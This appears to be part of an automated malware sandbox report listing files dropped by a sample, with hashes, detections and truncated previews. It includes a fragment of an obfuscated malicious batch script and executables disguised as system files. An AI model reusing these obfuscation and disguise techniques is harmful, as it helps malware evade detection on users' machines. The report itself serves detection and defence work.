                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iw0tomn3.0gy.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdufxdae.5jy.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sonyhrpi.jy2.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tduejw4d.rvj.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqqlnaci.u1e.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\b.bat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\e7WMhx18XN.exe
                                                                                                                                                        File Type:DOS batch file, ASCII text, with very long lines (5582), with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5235000
                                                                                                                                                        Entropy (8bit):6.0073843628876284
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:MlmdAvbhv4H9a3Ibr4dk/nWWwzWjOkGa0KICsmqTulEplv7py:T
                                                                                                                                                        MD5:21986423B4FADCE84294B0357B589099
                                                                                                                                                        SHA1:3009CF439A166ED1E44AD5D67E42626D7998B3D0
                                                                                                                                                        SHA-256:A420A6A98959A1FF28F81054E0A04C1E9E95361D9CEBF2F92FDACD9B3A8709A6
                                                                                                                                                        SHA-512:0CBC3255BA1760D0D6FAAA116B36C2EFD5A74E69F0E362AC3D82EBFF6FAE46B8E63137557ADEB7F80BB56FF8E823C903A0D41058A430AE461108FEBE78DFE0E9
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:@echo off..%^%@%JeXxkwhVwIaGfhusFhDqicMcbyWrrMiIExlDzGeJRZPuBlWLlaNVUpOHsUvMzQEKzrbHWQSYcTyjmsBQBkfqYnOpJElFksjaufUjkoPuiOSaQFuZtFkpKoLmDMYrEnNKJyOhxrFnuLhkuNzeklmFhUqgtIGxpyPUahrsQmCbZWUYgBRPnUgsbiCOiHOOKiXWWmkmwgnYJkGlaraSRR%%^%e%vrwTSEDkixOrQYYcTrEtgGiJQBrOQHWXSYCEAtsHTWfAUTQmcohBmydOjMdqnOtABRySvtCAYWAjBHOXLeMCAvKuVOvNpbueDEYduXQIMGCpYTmBXfFicQaggdWHYOkXCvGXJLCNndPTSv%%^%c%bCTPkwlcMDSXqajKXwEMCnoSmCRUYbgnLHVeeYZBrtTtQOmMetRxnITOnbDHEqdLwElJffFZwdvjtUbyqfQFjJZdOgQdvsWaqhXmCCGYNSakmKutZerzzxCMEiUZoBDehvSmXPVNySSqJPReLxeqaxASFkHuIHKloWc%%^%h%RivkiDbHFldPqQnRxndKVaHNhBfQhGbMMamDbUhxvSntgRdRuSObSsVRBIcHxkzYkqcqDJPDfFocMnGpxowpSaUufvctSzZlsojQPNnKdkVneSenbMkjNkgjwIkhHvLFGcKxeQAJaMlHeGqmrOrfpQxhiZtgCfcIzqHbhHillAibZyfPsXQTdFpPFDofwtgUJDhNZo%%^%o%JGgUPHwhJTEOFojEUaRvEsdPRtnrwrrPdShmXLAijvElSFBGAYnNiTzrDrcvteLsBOLMhWGjzImjNRWmSHQxdEHksPJGJfPeJmKeUPyErenzGqDLuPDLnopXgBtrmazuThABh%%^% %scjmfZqhDclYlTBdRuWMXswgsrESGzPcECwACbjpGZXqgoPGTQqgEuUZGcUOuxBenjtIwaBQkGgXvgadBXZQiJxkIwUzgvUiyTcWVhjSoAVX

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\paint.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\e7WMhx18XN.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2234368
                                                                                                                                                        Entropy (8bit):7.999668641098463
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:RR7ODqfbvxzT97xYnP2ZHMv/KXm6O0s8n5AGbHz03WJmE:RR7OgbvtT97EaHMvC1O0ZlbI3jE
                                                                                                                                                        MD5:9CA610EB2F785C8D2DDF2A50347039ED
                                                                                                                                                        SHA1:DB44EDA1468EE8FAC51C88BC0D3298826CB22DC5
                                                                                                                                                        SHA-256:0404B99E5DF31AB12B2ABDB9AA805E1ADEF3936B8A0B234F601E5AEE11289655
                                                                                                                                                        SHA-512:864A98A7E7F69B4945D424A0C6B3AB43E3292E1783392A398C175A7CA34F32E97AAACAF0DB1913A80FE67353E385A7C2FDF01389BDA7E12A5DD8C248CD472BB5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P"......".....................................................0)".<............@".....................................................................l)"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\services64.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\conhost.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2234368
                                                                                                                                                        Entropy (8bit):7.999668641098463
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:RR7ODqfbvxzT97xYnP2ZHMv/KXm6O0s8n5AGbHz03WJmE:RR7OgbvtT97EaHMvC1O0ZlbI3jE
                                                                                                                                                        MD5:9CA610EB2F785C8D2DDF2A50347039ED
                                                                                                                                                        SHA1:DB44EDA1468EE8FAC51C88BC0D3298826CB22DC5
                                                                                                                                                        SHA-256:0404B99E5DF31AB12B2ABDB9AA805E1ADEF3936B8A0B234F601E5AEE11289655
                                                                                                                                                        SHA-512:864A98A7E7F69B4945D424A0C6B3AB43E3292E1783392A398C175A7CA34F32E97AAACAF0DB1913A80FE67353E385A7C2FDF01389BDA7E12A5DD8C248CD472BB5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P"......".....................................................0)".<............@".....................................................................l)"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-07

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):416
                                                                                                                                                        Entropy (8bit):7.52741317979437
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:dqvmX4ypYqLv5f9GrvGXU0lZIGfzX6f8lA:umXJW85f9qYU0TI2LO8lA
                                                                                                                                                        MD5:240D48F60FA5303114842C37E3D6D6FA
                                                                                                                                                        SHA1:FDFD7E4CA72B657F9803E5616DED01585A21473B
                                                                                                                                                        SHA-256:4EE0C45C600ECE689EE8016F64134FBA593BA663189CB386045C2A88F891EA51
                                                                                                                                                        SHA-512:80B50CD70CE378B6479C63817B16387F8E4CFCCBBB2C958051F119306953A3A124DE7103661C585BC9E56F3B2E5ADDF040BCD098BE2D72448A8650A486FA3D7D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.../..SXM?..3.W.*...qo..r....H.}1....89.i...V67.`.{.....uMz.b....9...V...~.C3.\....I.n..f.Q..;.y,hd.w&a..[I@..H.5.*bV...Fv..y..............1.Ul\J.H...ZU..!....h'..j.D."d...w.h.=m=......z...0........ ..>.......M]n.Yy....H......T...op......xpWG-r.._,.TM.......l.A_...(CQ...o!B........H.g>&-..,....kN.V<t@^...p..?.:./..j '... .3...l...g...`$.jY.,..#.t..K.5...C...p;..>h..k*.k...V.Gr!.S...q.m.C...

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\conhost.exe
                                                                                                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):14544
                                                                                                                                                        Entropy (8bit):6.2660301556221185
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                        • Filename: GcqJPBLD2Q.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: C5Lg2JSPlD.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: TwrhjEKqxk.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: aA45th2ixY.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: 1mqzOM6eok.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: updater.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: 7QiAmg58Jk.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: LnK0dS8jcA.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe, Detection: malicious, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\conhost.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31232
                                                                                                                                                        Entropy (8bit):7.570601203863118
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:cBTkmACK5dUVInkbmV4HxueiFK9RXmnGQ5bIiox+H9F4IlCfhpGlq4BmY1NGvmJd:/H5V/qR2nGQ5bkC7lq4BNqmJr
                                                                                                                                                        MD5:61D09675A406E39F17F2EA03A3CB8CCC
                                                                                                                                                        SHA1:ED3B8E75D6FA0B61A3E18BD308F61647A7ABE161
                                                                                                                                                        SHA-256:43702440B1CB03293360D7012333845039B807B50C6F187C9E6CCDAD1D65DA89
                                                                                                                                                        SHA-512:E5964E6E4CA28BCE1396ED66A220099922E66338813B0B1D13A2306FE0B338E4CFB157444B4A11640A8916410C43379B54ED244FCA009316522B67CDE98D41F3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........`......."........@......................................k......................................................0...<...................................................................................l................................text............................... ..`.rdata..n]...0...^..................@..@.bss.....................................pdata...............x..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Windows\$rbx-onimai2\$rbx-CO2.bat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:DOS batch file, ASCII text, with very long lines (5582), with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5235000
                                                                                                                                                        Entropy (8bit):6.0073843628876284
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:MlmdAvbhv4H9a3Ibr4dk/nWWwzWjOkGa0KICsmqTulEplv7py:T
                                                                                                                                                        MD5:21986423B4FADCE84294B0357B589099
                                                                                                                                                        SHA1:3009CF439A166ED1E44AD5D67E42626D7998B3D0
                                                                                                                                                        SHA-256:A420A6A98959A1FF28F81054E0A04C1E9E95361D9CEBF2F92FDACD9B3A8709A6
                                                                                                                                                        SHA-512:0CBC3255BA1760D0D6FAAA116B36C2EFD5A74E69F0E362AC3D82EBFF6FAE46B8E63137557ADEB7F80BB56FF8E823C903A0D41058A430AE461108FEBE78DFE0E9
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:@echo off..%^%@%JeXxkwhVwIaGfhusFhDqicMcbyWrrMiIExlDzGeJRZPuBlWLlaNVUpOHsUvMzQEKzrbHWQSYcTyjmsBQBkfqYnOpJElFksjaufUjkoPuiOSaQFuZtFkpKoLmDMYrEnNKJyOhxrFnuLhkuNzeklmFhUqgtIGxpyPUahrsQmCbZWUYgBRPnUgsbiCOiHOOKiXWWmkmwgnYJkGlaraSRR%%^%e%vrwTSEDkixOrQYYcTrEtgGiJQBrOQHWXSYCEAtsHTWfAUTQmcohBmydOjMdqnOtABRySvtCAYWAjBHOXLeMCAvKuVOvNpbueDEYduXQIMGCpYTmBXfFicQaggdWHYOkXCvGXJLCNndPTSv%%^%c%bCTPkwlcMDSXqajKXwEMCnoSmCRUYbgnLHVeeYZBrtTtQOmMetRxnITOnbDHEqdLwElJffFZwdvjtUbyqfQFjJZdOgQdvsWaqhXmCCGYNSakmKutZerzzxCMEiUZoBDehvSmXPVNySSqJPReLxeqaxASFkHuIHKloWc%%^%h%RivkiDbHFldPqQnRxndKVaHNhBfQhGbMMamDbUhxvSntgRdRuSObSsVRBIcHxkzYkqcqDJPDfFocMnGpxowpSaUufvctSzZlsojQPNnKdkVneSenbMkjNkgjwIkhHvLFGcKxeQAJaMlHeGqmrOrfpQxhiZtgCfcIzqHbhHillAibZyfPsXQTdFpPFDofwtgUJDhNZo%%^%o%JGgUPHwhJTEOFojEUaRvEsdPRtnrwrrPdShmXLAijvElSFBGAYnNiTzrDrcvteLsBOLMhWGjzImjNRWmSHQxdEHksPJGJfPeJmKeUPyErenzGqDLuPDLnopXgBtrmazuThABh%%^% %scjmfZqhDclYlTBdRuWMXswgsrESGzPcECwACbjpGZXqgoPGTQqgEuUZGcUOuxBenjtIwaBQkGgXvgadBXZQiJxkIwUzgvUiyTcWVhjSoAVX

                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):4926
                                                                                                                                                        Entropy (8bit):3.2455800401968844
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:FaqdF7w8l0+AAHdKoqKFxcxkF28lraqdF7/t3+AAHdKoqKFxcxkFltt:cEG+AAsoJjykcEN+AAsoJjykn
                                                                                                                                                        MD5:0A362A11FE30B0DFACA57A15F776B2F4
                                                                                                                                                        SHA1:BF789925A21249BEB9CF67866C6E81397D2A4A71
                                                                                                                                                        SHA-256:07F7F34823BB951A0D3388864E79A8C2F958CF4BE42EE1D9B39EA78BBD04E472
                                                                                                                                                        SHA-512:DFD929A3BB09C7B03CA092E97C2ED70B7D63698D25F34DCBBF2C4291CC8374C2A1E9663B00AE752A7649BC5DB80153DD61E59B316027B7C6966A424CF7F603E0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. O.c.t. .. 0.5. .. 2.0.2.3. .1.2.:.2.8.:.3.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):64
                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@...e...........................................................

                                                                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_01zdaidu.4jh.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_3fc24ylm.ndk.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_4cj4hbri.jpm.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_j4whasan.x5q.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
